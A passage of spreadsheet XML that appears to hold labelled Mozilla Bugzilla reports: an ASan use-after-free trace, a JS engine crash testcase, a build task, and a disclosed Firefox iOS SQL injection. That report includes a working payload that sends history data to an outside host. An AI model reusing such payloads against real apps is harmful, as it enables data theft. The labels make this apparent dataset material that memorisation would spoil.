    #31 0x7f555a7501d1 in ReflowChild /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsContainerFrame.cpp:963
    #32 0x7f555a751729 in ReflowContents /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsGfxScrollFrame.cpp:621
    #33 0x7f555a753ac5 in Reflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsGfxScrollFrame.cpp:856
    #34 0x7f555a6c1fbe in ReflowChild /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsContainerFrame.cpp:1005
    #35 0x7f555a8a66ff in Reflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsViewportFrame.cpp:217
    #36 0x7f555a5bc49a in DoReflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsPresShell.cpp:9159
    #37 0x7f555a5d0e48 in ProcessReflowCommands /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsPresShell.cpp:9319
    #38 0x7f555a5d02ca in FlushPendingNotifications /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsPresShell.cpp:4320
    #39 0x7f555a34cae3 in Tick /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:1663
    #40 0x7f555a3556a0 in TickDriver /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:198
    #41 0x7f555a354f0d in RunRefreshDrivers /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:440
    #42 0x7f555abb7140 in RecvNotify /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/ipc/VsyncChild.cpp:63
    #43 0x7f55557ed52c in OnMessageReceived /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/./PVsyncChild.cpp:224
    #44 0x7f555539a53c in OnMessageReceived /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/./PBackgroundChild.cpp:1082
    #45 0x7f5555329dc2 in DispatchAsyncMessage /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1237
    #46 0x7f5555327856 in DispatchMessage /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1164
    #47 0x7f555531bc94 in OnMaybeDequeueOne /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1148
    #48 0x7f55552bf914 in RunTask /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:361
    #49 0x7f55552c09c7 in DoWork /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:456
    #50 0x7f5555331062 in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:233
    #51 0x7f5554a76d04 in ProcessNextEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:866
    #52 0x7f5554ad90ea in NS_ProcessNextEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #53 0x7f55553307a8 in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:140
    #54 0x7f55552be49c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #55 0x7f5559d3ad17 in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/widget/nsBaseAppShell.cpp:164
    #56 0x7f555b8c9d72 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:738
    #57 0x7f55552be49c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #58 0x7f555b8c93e2 in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:575
    #59 0x48ce81 in content_process_main /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:222
    #60 0x7f55525d8ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
    #61 0x48c24c in _start ??:?
0x62b000038200 is located 0 bytes inside of 26492-byte region [0x62b000038200,0x62b00003e97c)
freed by thread T0 (Web Content) here:
    #0 0x474661 in __interceptor_free _asan_rtl_
    #1 0x7f555a857387 in AssignTextRun /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsTextFrame.cpp:2584
    #2 0x7f555a8504be in BuildTextRunForFrames /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsTextFrame.cpp:2255
    #3 0x7f555a84a7a0 in FlushFrames /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsTextFrame.cpp:1508
    #4 0x7f555a859862 in BuildTextRuns /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsTextFrame.cpp:1437
    #5 0x7f555a88f4ac in ReflowText /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsTextFrame.cpp:8229
    #6 0x7f555a614245 in ReflowFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsLineLayout.cpp:957
    #7 0x7f555a7e4173 in ReflowInlineFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:774
    #8 0x7f555a7e3084 in ReflowFrames /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:658
    #9 0x7f555a7e1e9d in Reflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:434
    #10 0x7f555a6141c0 in ReflowFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsLineLayout.cpp:955
    #11 0x7f555a7e4173 in ReflowInlineFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:774
    #12 0x7f555a7e3084 in ReflowFrames /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:658
    #13 0x7f555a7e1e9d in Reflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:434
    #14 0x7f555a6141c0 in ReflowFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsLineLayout.cpp:955
    #15 0x7f555a7e4173 in ReflowInlineFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:774
    #16 0x7f555a7e3084 in ReflowFrames /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:658
    #17 0x7f555a7e1e9d in Reflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:434
    #18 0x7f555a6141c0 in ReflowFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsLineLayout.cpp:955
    #19 0x7f555a679a71 in ReflowInlineFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:3959
    #20 0x7f555a6781e3 in DoReflowInlineFrames /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:3761
    #21 0x7f555a66f682 in ReflowInlineFrames /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:3627
    #22 0x7f555a66119b in ReflowLine /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:2713
    #23 0x7f555a659d24 in Reflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:1160
    #24 0x7f555a675894 in ReflowBlock /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockReflowContext.cpp:291
    #25 0x7f555a66cd1c in ReflowBlockFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:3354
    #26 0x7f555a6611bb in ReflowLine /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:2710
    #27 0x7f555a659d24 in Reflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:1160
    #28 0x7f555a6c1c25 in ReflowChild /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsContainerFrame.cpp:963
    #29 0x7f555a6a7a39 in Reflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsCanvasFrame.cpp:672
previously allocated by thread T0 (Web Content) here:
    #0 0x474861 in __interceptor_malloc _asan_rtl_
    #1 0x7f55567778fe in AllocateStorageForTextRun /builds/slave/m-cen-l64-asan-000000000000000/build/src/gfx/thebes/gfxTextRun.cpp:109
    #2 0x7f555a8502aa in MakeTextRun&lt;unsigned char&gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsTextFrame.cpp:581
    #3 0x7f555a84a7a0 in FlushFrames /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsTextFrame.cpp:1508
    #4 0x7f555a859862 in BuildTextRuns /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsTextFrame.cpp:1437
    #5 0x7f555a88f4ac in ReflowText /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsTextFrame.cpp:8229
    #6 0x7f555a614245 in ReflowFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsLineLayout.cpp:957
    #7 0x7f555a7e4173 in ReflowInlineFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:774
    #8 0x7f555a7e3084 in ReflowFrames /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:658
    #9 0x7f555a7e1e9d in Reflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:434
    #10 0x7f555a6141c0 in ReflowFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsLineLayout.cpp:955
    #11 0x7f555a7e4173 in ReflowInlineFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:774
    #12 0x7f555a7e3084 in ReflowFrames /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:658
    #13 0x7f555a7e1e9d in Reflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:434
    #14 0x7f555a6141c0 in ReflowFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsLineLayout.cpp:955
    #15 0x7f555a7e4173 in ReflowInlineFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:774
    #16 0x7f555a7e3084 in ReflowFrames /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:658
    #17 0x7f555a7e1e9d in Reflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsInlineFrame.cpp:434
    #18 0x7f555a6141c0 in ReflowFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsLineLayout.cpp:955
    #19 0x7f555a679a71 in ReflowInlineFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:3959
    #20 0x7f555a6781e3 in DoReflowInlineFrames /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:3761
    #21 0x7f555a66f682 in ReflowInlineFrames /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:3627
    #22 0x7f555a66119b in ReflowLine /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:2713
    #23 0x7f555a659d24 in Reflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:1160
    #24 0x7f555a675894 in ReflowBlock /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockReflowContext.cpp:291
    #25 0x7f555a66cd1c in ReflowBlockFrame /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:3354
    #26 0x7f555a6611bb in ReflowLine /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:2710
    #27 0x7f555a659d24 in Reflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:1160
    #28 0x7f555a6c1c25 in ReflowChild /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsContainerFrame.cpp:963
    #29 0x7f555a6a7a39 in Reflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsCanvasFrame.cpp:672
SUMMARY: AddressSanitizer: heap-use-after-free ??:0 ??
Shadow bytes around the buggy address:
  0x0c567fffeff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c567ffff000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c567ffff010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c567ffff020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c567ffff030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c567ffff040:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c567ffff050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c567ffff060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c567ffff070: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c567ffff080: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c567ffff090: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:
==3799==ABORTING</t>
        </is>
      </c>
      <c r="X3317" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3318">
      <c r="A3318" t="n">
        <v>1767205</v>
      </c>
      <c r="B3318" t="inlineStr">
        <is>
          <t>2022-05-01 14:17:12 -0700</t>
        </is>
      </c>
      <c r="C3318" t="inlineStr">
        <is>
          <t>SQL injection in History tab on Firefox iOS</t>
        </is>
      </c>
      <c r="D3318" t="inlineStr">
        <is>
          <t>2024-08-14 15:36:25 -0700</t>
        </is>
      </c>
      <c r="E3318" t="n">
        <v>1</v>
      </c>
      <c r="F3318" t="n">
        <v>1</v>
      </c>
      <c r="G3318" t="n">
        <v>2</v>
      </c>
      <c r="H3318" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3318" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J3318" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3318" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3318" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3318" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3318" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3318" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3318" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form]</t>
        </is>
      </c>
      <c r="Q3318" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3318" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3318" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3318" t="n">
        <v>1</v>
      </c>
      <c r="U3318" t="n">
        <v>0</v>
      </c>
      <c r="V3318" t="n">
        <v>9</v>
      </c>
      <c r="W3318" t="inlineStr">
        <is>
          <t>Created attachment 9274589
history_sqli.mov
In Firefox iOS, the following SQL query incorporates the variable `searchTerm` as a string.
https://github.com/mozilla-mobile/firefox-ios/blob/b0efb5ad72289b40d912ae0fa9230b6a524679a0/Storage/SQL/SQLiteHistory.swift#L622
The `searchTerm` can be specified externally, so SQL injection can be triggered.
The steps to reproduce the injection are below.
(1) Visit https://csrf.jp/2022/fxios/history.php
(2) Tap the link on the page, and the attack payload will be stored in your clipboard
(3) Open History tab from the hamburger menu and tap the magnifying glass icon
(4) Paste the search word from your clipboard, then you can see the following payload in the text input field
`a" union select 1,'','https://csrf.jp/2022/fxios/history.php?'||group_concat(media_url), 'Click Me!',1,1,1,1,1 from page_metadata;`
(5) One history record that name is "click me!" is shown in the history list
(6) Tap the record, then your history data will be stolen to the malicious page
The attached is a video demonstration of the above attack.</t>
        </is>
      </c>
      <c r="X3318" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3319">
      <c r="A3319" t="n">
        <v>1571559</v>
      </c>
      <c r="B3319" t="inlineStr">
        <is>
          <t>2019-08-05 14:48:30 -0700</t>
        </is>
      </c>
      <c r="C3319" t="inlineStr">
        <is>
          <t>add support for a --with-wasi-sysroot option</t>
        </is>
      </c>
      <c r="D3319" t="inlineStr">
        <is>
          <t>2019-09-21 03:13:19 -0700</t>
        </is>
      </c>
      <c r="E3319" t="n">
        <v>1</v>
      </c>
      <c r="F3319" t="n">
        <v>1</v>
      </c>
      <c r="G3319" t="n">
        <v>7</v>
      </c>
      <c r="H3319" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3319" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J3319" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3319" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3319" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3319" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3319" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3319" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3319" t="inlineStr"/>
      <c r="Q3319" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3319" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3319" t="inlineStr">
        <is>
          <t>mozilla71</t>
        </is>
      </c>
      <c r="T3319" t="n">
        <v>1</v>
      </c>
      <c r="U3319" t="n">
        <v>0</v>
      </c>
      <c r="V3319" t="n">
        <v>6</v>
      </c>
      <c r="W3319" t="inlineStr">
        <is>
          <t>This task tracks the progress of including the clang compiler toolchain to build wasm libraries in the Firefox build system. This task will enable allow the compilation of components to produce a wasm file compatible with wasi.
There are 2 approaches to do this
1. Include a prebuilt release of clang+wasm+wasi released as part of cranelift work [here](https://github.com/CraneStation/wasi-sdk/releases). I believe this clang defaults to wasm target and the wasi libc by default, so this clang can be used as normal, requiring no additional flags or arguments.
2. Build from source. The details to build are provided below. When built from source, we have to pass some extra flags (listed below) as part of the command line invocation of clang.
**Building from source**
1. Get source code for stock clang and llvm 8 (needed for wasm backend). 
2. Get the llvm lld linker from [here](https://github.com/llvm-mirror/lld.git) and include it in the tools folder of llvm. lld will now be built along with clang.
3. clang would have to be configured with the CMAKE flag `LLVM_EXPERIMENTAL_TARGETS_TO_BUILD=WebAssembly`  to enable the wasm backend (as clang does not include this by default).
4. Build clang
5. Get the wasi sysroot - i.e. libc implementation that is wasm compatible from [here](https://github.com/CraneStation/wasi-libc)
6. Build the wasi sysroot with the clang that was compiled in step 4 (more details available on the sysroot readme).
Files can now be compiled with 
```
clang -B$(PATH_TO_LLD) --target=wasm32-wasi --sysroot $(PATH_TO_WASI_SYSROOT) &lt;normal args to clang...&gt;
```</t>
        </is>
      </c>
      <c r="X3319" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3320">
      <c r="A3320" t="n">
        <v>1145781</v>
      </c>
      <c r="B3320" t="inlineStr">
        <is>
          <t>2015-03-20 13:20:01 -0700</t>
        </is>
      </c>
      <c r="C3320" t="inlineStr">
        <is>
          <t>Assertion failure: hasScript(), at js/src/shell/../jsfun.h:322 with Debugger</t>
        </is>
      </c>
      <c r="D3320" t="inlineStr">
        <is>
          <t>2016-07-02 10:34:30 -0700</t>
        </is>
      </c>
      <c r="E3320" t="n">
        <v>1</v>
      </c>
      <c r="F3320" t="n">
        <v>1</v>
      </c>
      <c r="G3320" t="n">
        <v>3</v>
      </c>
      <c r="H3320" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3320" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3320" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3320" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3320" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3320" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3320" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3320" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3320" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main39+]</t>
        </is>
      </c>
      <c r="Q3320" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3320" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3320" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T3320" t="n">
        <v>1</v>
      </c>
      <c r="U3320" t="n">
        <v>0</v>
      </c>
      <c r="V3320" t="n">
        <v>15</v>
      </c>
      <c r="W3320" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 4d2d97b3ba34 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug, run with --fuzzing-safe --thread-count=2):
gczeal(2);
var g = newGlobal();
g.eval('function f() { return "from f"; }');
var dbg = new Debugger;
var gw = dbg.makeGlobalObjectReference(g);
var fw = gw.getOwnPropertyDescriptor('f').value;
newGlobal(dbg.g, false);
dbg.addDebuggee(g);
var fenv = fw.environment;
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x00000000004056d8 in JSFunction::nonLazyScript (this=&lt;optimized out&gt;) at js/src/shell/../jsfun.h:322
#0  0x00000000004056d8 in JSFunction::nonLazyScript (this=&lt;optimized out&gt;) at js/src/shell/../jsfun.h:322
#1  0x000000000046eb4a in JSFunction::nonLazyScript (this=&lt;optimized out&gt;) at js/src/shell/../jsfun.h:325
#2  0x00000000006b8c85 in js::GetDebugScopeForFunction (cx=cx@entry=0x1a19ee0, fun=..., fun@entry=...) at js/src/vm/ScopeObject.cpp:2478
#3  0x000000000061e815 in DebuggerObject_getEnvironment (cx=0x1a19ee0, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at js/src/vm/Debugger.cpp:6650
#4  0x0000000000642d92 in js::CallJSNative (cx=0x1a19ee0, native=0x61e600 &lt;DebuggerObject_getEnvironment(JSContext*, unsigned int, JS::Value*)&gt;, args=...) at js/src/jscntxtinlines.h:235
#5  0x0000000000631ee3 in js::Invoke (cx=cx@entry=0x1a19ee0, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:502
#6  0x00000000006339a3 in js::Invoke (cx=cx@entry=0x1a19ee0, thisv=..., fval=..., argc=argc@entry=0, argv=argv@entry=0x0, rval=..., rval@entry=...) at js/src/vm/Interpreter.cpp:558
#7  0x00000000006374da in js::InvokeGetterOrSetter (cx=cx@entry=0x1a19ee0, obj=0x7ffff5463160, fval=..., argc=argc@entry=0, argv=argv@entry=0x0, rval=rval@entry=...) at js/src/vm/Interpreter.cpp:628
#8  0x000000000069c213 in CallGetter (vp=..., shape=..., receiver=..., cx=0x1a19ee0) at js/src/vm/NativeObject.cpp:1614
#9  GetExistingProperty&lt;(js::AllowGC)1&gt; (cx=0x1a19ee0, receiver=..., obj=..., shape=..., vp=...) at js/src/vm/NativeObject.cpp:1664
#10 0x000000000069c71a in NativeGetPropertyInline&lt;(js::AllowGC)1&gt; (cx=0x1a19ee0, obj=..., receiver=..., id=..., nameLookup=nameLookup@entry=NotNameLookup, vp=...) at js/src/vm/NativeObject.cpp:1878
#11 0x000000000069cbe0 in js::NativeGetProperty (cx=&lt;optimized out&gt;, obj=..., receiver=..., id=..., vp=...) at js/src/vm/NativeObject.cpp:1912
#12 0x00000000004c26e0 in js::GetProperty (cx=&lt;optimized out&gt;, obj=..., receiver=..., id=..., vp=...) at js/src/vm/NativeObject.h:1434
#13 0x000000000062580f in GetPropertyOperation (vp=..., lval=..., pc=&lt;optimized out&gt;, script=..., fp=&lt;optimized out&gt;, cx=0x1a19ee0) at js/src/vm/Interpreter.cpp:260
#14 Interpret (cx=cx@entry=0x1a19ee0, state=...) at js/src/vm/Interpreter.cpp:2417
#15 0x0000000000631c48 in js::RunScript (cx=cx@entry=0x1a19ee0, state=...) at js/src/vm/Interpreter.cpp:452
#16 0x0000000000638b49 in js::ExecuteKernel (cx=cx@entry=0x1a19ee0, script=..., script@entry=..., scopeChainArg=..., thisv=..., type=type@entry=js::EXECUTE_GLOBAL, evalInFrame=evalInFrame@entry=..., result=result@entry=0x0) at js/src/vm/Interpreter.cpp:655
#17 0x000000000063acd0 in js::Execute (cx=cx@entry=0x1a19ee0, script=script@entry=..., scopeChainArg=..., rval=rval@entry=0x0) at js/src/vm/Interpreter.cpp:695
#18 0x0000000000a17717 in ExecuteScript (cx=cx@entry=0x1a19ee0, obj=..., scriptArg=..., rval=rval@entry=0x0) at js/src/jsapi.cpp:4091
#19 0x0000000000a1784b in JS_ExecuteScript (cx=cx@entry=0x1a19ee0, scriptArg=..., scriptArg@entry=...) at js/src/jsapi.cpp:4113
#20 0x0000000000406887 in RunFile (compileOnly=false, file=0x1a8a5a0, filename=0x7fffffffdf72 "min.js", cx=0x1a19ee0) at js/src/shell/js.cpp:466
#21 Process (cx=cx@entry=0x1a19ee0, filename=0x7fffffffdf72 "min.js", forceTTY=forceTTY@entry=false) at js/src/shell/js.cpp:597
#22 0x0000000000453b22 in ProcessArgs (op=0x7fffffffda00, cx=0x1a19ee0) at js/src/shell/js.cpp:5738
#23 Shell (envp=&lt;optimized out&gt;, op=0x7fffffffda00, cx=0x1a19ee0) at js/src/shell/js.cpp:6004
#24 main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, envp=&lt;optimized out&gt;) at js/src/shell/js.cpp:6346
rax	0x0	0
rbx	0x1a19ee0	27369184
rcx	0x7ffff6ca53cd	140737333842893
rdx	0x0	0
rsi	0x7ffff6f7a9d0	140737336814032
rdi	0x7ffff6f791c0	140737336807872
rbp	0x7fffffffc120	140737488339232
rsp	0x7fffffffc120	140737488339232
r8	0x7ffff7fe0780	140737354008448
r9	0x6372732f736a2f6c	7165916604736876396
r10	0x7fffffffbee0	140737488338656
r11	0x7ffff6c27960	140737333328224
r12	0x7fffffffc280	140737488339584
r13	0x7fffffffc150	140737488339280
r14	0x19d5380	27087744
r15	0x7fffffffc270	140737488339568
rip	0x4056d8 &lt;JSFunction::nonLazyScript() const+28&gt;
=&gt; 0x4056d8 &lt;JSFunction::nonLazyScript() const+28&gt;:	movl   $0x142,0x0
   0x4056e3 &lt;JSFunction::nonLazyScript() const+39&gt;:	callq  0x4046a0 &lt;abort@plt&gt;
Marking s-s because gczeal is involved. Might only affect the debugger though.</t>
        </is>
      </c>
      <c r="X3320" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3321">
      <c r="A3321" t="n">
        <v>904554</v>
      </c>
      <c r="B3321" t="inlineStr">
        <is>
          <t>2013-08-13 05:37:39 -0700</t>
        </is>
      </c>
      <c r="C3321" t="inlineStr">
        <is>
          <t>Boosts not being applied to wiki_documents</t>
        </is>
      </c>
      <c r="D3321" t="inlineStr">
        <is>
          <t>2013-08-13 07:11:26 -0700</t>
        </is>
      </c>
      <c r="E3321" t="n">
        <v>1</v>
      </c>
      <c r="F3321" t="n">
        <v>1</v>
      </c>
      <c r="G3321" t="n">
        <v>5</v>
      </c>
      <c r="H3321" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3321" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3321" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K3321" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3321" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3321" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3321" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3321" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3321" t="inlineStr">
        <is>
          <t>u=user c=search p=0 s=2013.16</t>
        </is>
      </c>
      <c r="Q3321" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3321" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3321" t="inlineStr">
        <is>
          <t>2013Q3</t>
        </is>
      </c>
      <c r="T3321" t="n">
        <v>1</v>
      </c>
      <c r="U3321" t="n">
        <v>0</v>
      </c>
      <c r="V3321" t="n">
